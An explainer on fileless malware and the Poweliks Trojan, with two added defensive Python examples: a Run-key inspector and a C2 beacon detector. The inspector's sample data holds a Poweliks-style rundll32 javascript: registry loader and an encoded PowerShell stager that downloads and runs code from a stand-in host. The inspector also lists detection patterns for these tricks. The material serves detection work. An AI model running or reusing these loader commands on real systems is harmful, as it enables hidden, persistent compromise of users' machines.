Fileless malware drew wide attention in August 2014, when the Poweliks Trojan was first analysed. The idea itself is older (memory-only worms such as Code Red in 2001 and SQL Slammer in 2003 never wrote themselves to disk), but Poweliks brought it into mainstream crimeware. It was initially engineered to perform click fraud, but it evolved to do much more.
WHAT ARE FILELESS INFECTIONS?
Fileless infections are largely what the name suggests: malware that runs without writing a malicious executable to disk. The code lives in memory, in the registry, or inside scripts handed to legitimate system tools, so there is no payload file for a scanner to find.
To understand their name, all we need is a very quick recap of how traditional antivirus products work:
The infection places files on the hard drive
The antivirus analyzes the malicious files (aka the payload)
If identified, the antivirus quarantines and/or removes the malicious files, keeping your computer safe.
These infections were called fileless because step one never happens: no malicious file is dropped onto the system for the scanner to examine.
The consequences? You guessed them:
- Traditional, signature-based antivirus products have nothing on disk to match, so they fail to identify the infection.
- Without additional protection, attackers can cause all sorts of damage.
We’re going to explain exactly what type of damage fileless infections can cause and how you can protect yourself from them. Let’s start with:
WHY CYBER CRIMINALS USE FILELESS MALWARE
Cyber criminals are resourceful and creative, and fileless infections are proof of it.
In their attacks, malicious hackers aim for:
Stealth – the ability to avoid being detected by security products for as long as possible
Privilege escalation – the capacity to exploit a vulnerability that will give them administrator access to the system, so they can do whatever they want
Information gathering – to harvest as much data about the victim and from the victim’s computer as possible (to be used later in other attacks)
Persistence – the ability to keep the malware on the system, undetected, for as long as possible.
What malware creators traded away with the first fileless infections was persistence, in exchange for stealth: a payload that exists only in RAM leaves nothing for a scanner to find, but it also disappears at reboot. Keeping the infection concealed while it carries out its intended actions is what matters here.
Once the exploit kit that delivers the fileless payload reaches the system (explained below), the malware can fulfil its purpose directly, without first installing anything. This is definitely not your typical malware!
Attackers later found ways to regain persistence without touching the disk. Poweliks, for example, kept its encoded script in a registry Run key so that it was reloaded at every logon; locations like the registry are scanned far less thoroughly by traditional antivirus products than the file system is.
This new type of infection brought new prospects for malware makers. They could now:
- create new malware that infects systems without triggering traditional detection mechanisms;
- use a successful fileless infection as a foothold for spreading further malware;
- run one-time info-stealing malware to gather information about an infected PC before infecting it with additional malware;
- move the payload, after exploitation, into the Windows registry to achieve persistence;
- employ sophisticated, flexible and even modular exploit kits to find and exploit vulnerabilities faster;
- take advantage of the steady supply of zero-day and not-yet-patched vulnerabilities to compromise a large number of computers;
- make fast and easy money by infecting machines with ransomware.
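As an added example (not part of the original article and not Poweliks’ own code), here is the check a responder would run against the registry persistence trick described in the list above: read the values under a Run key and flag the ones that launch a script host or an encoded PowerShell command instead of an ordinary program. The Run-key values are constructed for this example; the value names and the .invalid domain are assumptions, not observed indicators.

```python
import base64
import re
from typing import Dict, List, Optional

# Added example, not from the original article. It models the check a
# responder runs after a suspected Poweliks-style infection: inspect the
# values under a Run key and flag entries that start a script or an encoded
# PowerShell command instead of a normal executable. The sample values are
# constructed for this example, not captured from a real host; the embedded
# script points at a reserved .invalid domain.

def encode_powershell(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects
    (base64 over UTF-16LE). Used here only to build the sample data."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed sample: value name -> command line, as read from
# HKCU\Software\Microsoft\Windows\CurrentVersion\Run (assumed contents).
SAMPLE_RUN_VALUES: Dict[str, str] = {
    "OneDrive": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    # Poweliks-style loader: rundll32 is handed a javascript: URL so mshtml
    # evaluates script kept in the registry; no file on disk is needed.
    # The value name is a lone non-breaking space, a trick to hide the entry.
    "\u00a0": r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("a=1")',
    # Encoded PowerShell stager that downloads and runs the next stage in memory.
    "Sync": "powershell.exe -NoP -W Hidden -Enc "
            + encode_powershell("IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/a')"),
}

# Built-in hosts commonly abused to run script straight from a command line.
SCRIPT_HOST_PATTERNS = [
    (re.compile(r"rundll32(\.exe)?.*javascript:", re.I), "rundll32 launching javascript: (Poweliks-style)"),
    (re.compile(r"\bmshtml\b.*RunHTMLApplication", re.I), "mshtml RunHTMLApplication script loader"),
    (re.compile(r"\bmshta(\.exe)?\b", re.I), "mshta script host in a Run key"),
    (re.compile(r"\b[wc]script(\.exe)?\b.*(javascript|vbscript):", re.I), "wscript/cscript with inline script"),
]

# -e, -ec, -en..., -enc, -EncodedCommand; deliberately not -ex/-ExecutionPolicy.
ENCODED_ARG = re.compile(r"-(?:e|ec|en[a-z]*)\s+([A-Za-z0-9+/=]{16,})", re.I)
SUSPICIOUS_PS_TOKENS = ("IEX", "Invoke-Expression", "DownloadString", "Net.WebClient", "FromBase64String")

def decode_encoded_command(command: str) -> Optional[str]:
    """Return the plaintext of a -EncodedCommand argument, or None if there is
    none or it is not valid base64 / UTF-16LE."""
    m = ENCODED_ARG.search(command)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def inspect_run_value(name: str, command: str) -> dict:
    """Classify one Run-key value. An empty 'reasons' list means it looks like
    an ordinary autostart entry."""
    reasons: List[str] = []
    # Poweliks hid its entry under a name that regedit could not display.
    if not name.strip() or not name.isprintable() or not name.isascii():
        reasons.append("value name is empty, non-printable or non-ASCII")
    for pattern, label in SCRIPT_HOST_PATTERNS:
        if pattern.search(command):
            reasons.append(label)
    decoded = None
    if re.search(r"\b(powershell|pwsh)(\.exe)?\b", command, re.I):
        decoded = decode_encoded_command(command)
        if decoded is not None:
            reasons.append("powershell -EncodedCommand argument")
            hits = [t for t in SUSPICIOUS_PS_TOKENS if t.lower() in decoded.lower()]
            if hits:
                reasons.append("decoded script uses " + ", ".join(hits))
    return {"name": name, "command": command, "reasons": reasons, "decoded": decoded}

def find_suspicious_run_values(values: Dict[str, str]) -> List[dict]:
    """Return only the entries that raised at least one reason."""
    return [r for r in (inspect_run_value(n, c) for n, c in values.items()) if r["reasons"]]

if __name__ == "__main__":
    for finding in find_suspicious_run_values(SAMPLE_RUN_VALUES):
        print(repr(finding["name"]), "->", "; ".join(finding["reasons"]))
        if finding["decoded"]:
            print("   decoded:", finding["decoded"])
```

On a real host the dictionary would come from exporting the Run keys under HKCU and HKLM (and RunOnce), and the same checks apply to scheduled tasks and WMI subscriptions; the point is that the artefact to look for is a command line that loads script, not a file to hash.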
How fileless malware infections work
To avoid detection by traditional antivirus products, attackers chose not to install a malware program on the disk, where signature scanning would find it. Traditional antivirus can detect a malicious payload once it is dropped on disk, and occasionally when it runs in memory, but in either case only after the exploitation has already happened.
EXPLOIT KITS – A MUST-HAVE FOR FILELESS INFECTIONS
In any successful fileless malware infection, exploit kits play an important part. Exploit kits are software packages designed to find flaws, weaknesses or mistakes in applications and use them to gain access to your computer or any other system.
Two core factors are driving the rise in fileless malware infections:
Exploit kits as a service have become a reality, and cyber criminals of all skill levels are trying their hand at using them;
Malware makers are producing as many as 230,000 new malware samples per day, which gives attackers an endless supply of payloads to deliver.
Because a purely memory-resident payload lives only in your computer’s RAM, it survives only while you keep the PC on; a reboot wipes it. That gives attackers a smaller window of opportunity in which to carry out the attack, unless they add a registry-based persistence mechanism of the kind described above. It is also true that we keep our computers on for much longer than we used to, so in practice cyber criminals still have plenty of time to make the infection stick.
How to protect your computer against fileless infections
- When it first surfaced, fileless malware made computers run very slowly, because it consumed their RAM to carry out the attack. As you’d imagine, that made it easy to spot.
- But cyber criminals quickly improved their tactics and code so that the infection goes unnoticed.
- The best way to protect yourself from fileless malware is to stop the infection before it happens:
- apply security updates for your applications and operating system, so the exploit kit finds nothing to exploit;
- block the pages hosting the exploit kit;
- block the payload delivery;
- block the communication between your PC and the attackers’ servers.
- The last of these is the layer a proactive security product adds when the earlier ones have failed: cutting the channel between your computer and the servers controlled by cyber criminals.
By doing this, the attackers cannot retrieve the data collected from your PC, so data exfiltration attempts are futile. Moreover, cyber criminals cannot use that channel to infect your system with additional malware.
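Added example, not from the original article: a beacon detector over a constructed proxy log. Blocking the channel to the attackers’ servers presupposes spotting it, and a memory-resident implant with no file on disk still has to call home, usually on a timer. The log line format, addresses and host names below are constructed for the example and the .invalid domains are assumptions; the coefficient-of-variation threshold and the minimum hit count are tunable heuristics, not figures from the article.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev
from typing import Dict, List, Tuple
from urllib.parse import urlsplit

# Added example, not from the original article. Finds (client, host) pairs
# whose connection intervals are nearly constant, the timing signature of a
# beaconing implant, so the channel can be blocked at the proxy or firewall.

# Constructed sample in a simplified "timestamp client method url" format
# (assumed, not any proxy's native format). 10.0.0.15 runs an implant that
# tunnels TLS to c2.example.invalid about once a minute while the user browses.
SAMPLE_PROXY_LOG = """\
2015-06-01T09:00:02Z 10.0.0.15 CONNECT c2.example.invalid:443
2015-06-01T09:00:10Z 10.0.0.15 GET http://www.example.invalid/
2015-06-01T09:00:14Z 10.0.0.15 GET http://www.example.invalid/news
2015-06-01T09:00:51Z 10.0.0.15 GET http://www.example.invalid/news/2
2015-06-01T09:01:01Z 10.0.0.15 CONNECT c2.example.invalid:443
2015-06-01T09:02:03Z 10.0.0.15 CONNECT c2.example.invalid:443
2015-06-01T09:03:02Z 10.0.0.15 CONNECT c2.example.invalid:443
2015-06-01T09:03:30Z 10.0.0.15 GET http://www.example.invalid/about
2015-06-01T09:03:31Z 10.0.0.15 GET http://www.example.invalid/css/site.css
2015-06-01T09:04:01Z 10.0.0.15 CONNECT c2.example.invalid:443
2015-06-01T09:05:03Z 10.0.0.15 CONNECT c2.example.invalid:443
2015-06-01T09:09:05Z 10.0.0.15 GET http://www.example.invalid/contact
2015-06-01T09:00:00Z 10.0.0.22 GET http://update.example.invalid/check
2015-06-01T10:00:00Z 10.0.0.22 GET http://update.example.invalid/check
"""

LOG_LINE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>\S+) (?P<url>\S+)$")

def host_of(method: str, url: str) -> str:
    """CONNECT lines carry host:port rather than a full URL."""
    if method.upper() == "CONNECT":
        return url.rsplit(":", 1)[0].lower()
    return (urlsplit(url).hostname or "").lower()

def parse_log(text: str) -> List[Tuple[datetime, str, str]]:
    """Parse the sample format into (timestamp, client, host) records."""
    records = []
    for line in text.splitlines():
        m = LOG_LINE.match(line.strip())
        if not m:
            continue  # skip malformed lines rather than abort the run
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
        records.append((ts, m["client"], host_of(m["method"], m["url"])))
    return records

def find_beacons(records, min_hits: int = 5, max_cv: float = 0.2) -> List[dict]:
    """Report (client, host) pairs whose inter-connection gaps are nearly
    constant: coefficient of variation (stdev / mean) at or below max_cv.
    Pairs with fewer than min_hits connections give too few samples to judge
    and are ignored; small jitter, which real implants add, still passes."""
    by_pair: Dict[Tuple[str, str], List[datetime]] = defaultdict(list)
    for ts, client, host in records:
        by_pair[(client, host)].append(ts)
    beacons = []
    for (client, host), times in by_pair.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue
        cv = pstdev(gaps) / avg
        if cv <= max_cv:
            beacons.append({"client": client, "host": host, "hits": len(times),
                            "mean_interval": avg, "cv": cv})
    return beacons

if __name__ == "__main__":
    for b in find_beacons(parse_log(SAMPLE_PROXY_LOG)):
        print(f"{b['client']} -> {b['host']}: {b['hits']} hits, "
              f"every {b['mean_interval']:.0f}s (cv={b['cv']:.2f})")
```

In the sample only the c2.example.invalid pair is reported: the browsing traffic is irregular and the two update checks are too few to judge. A legitimate updater that polls on a fixed schedule would also score as periodic, so the output is a lead to block after confirmation, not a verdict on its own.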
Source: Heimdalacademy, google